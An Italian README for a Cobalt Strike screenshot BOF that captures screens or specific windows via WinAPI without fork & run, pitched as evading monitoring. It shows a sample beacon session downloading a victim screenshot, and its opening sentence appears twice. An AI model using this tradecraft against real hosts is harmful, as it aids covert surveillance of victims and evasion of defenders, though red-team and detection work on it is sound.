
Una funzionalità alternativa di screenshot per Cobalt Strike che utilizza WinAPI e non esegue un fork & run. Screenshot scaricato in memoria.
Una funzionalità di screenshot alternativa per Cobalt Strike che utilizza WinAPI e non esegue un fork & run. Screenshot scaricato in memoria.
make0: cattura schermo intero (PID = 0) PID specifico: cattura PID specifico (funziona anche quando è minimizzato!)
screenshot_bof senza argomenti aprirà un dialogo GUIbeacon> screenshot_bof file.jpg 2 21964 0 90 100
[*] Running screenshot BOF by (@codex_tf2)
[+] host called home, sent: 12421 bytes
[+] received output:
Downloading JPEG over beacon as a screenshot with filename file.jpg
[*] received screenshot of Screenshot from Admin (26kb)
[+] received output:
Screenshot saved/downloaded successfully
Cobalt Strike utilizza una tecnica nota come fork & run per molte delle sue capacità post-ex, incluso il comando screenshot. Sebbene questo comportamento offra stabilità, è ormai ben noto e pesantemente monitorato. Questo BOF è pensato per fornire una versione più sicura dal punto di vista OPSEC della funzionalità screenshot.
il solito disclaimer, non sono responsabile per eventuali crimini contro l'umanità che potresti commettere o guerre nucleari che potresti causare usando questo pezzo di codice mal scritto.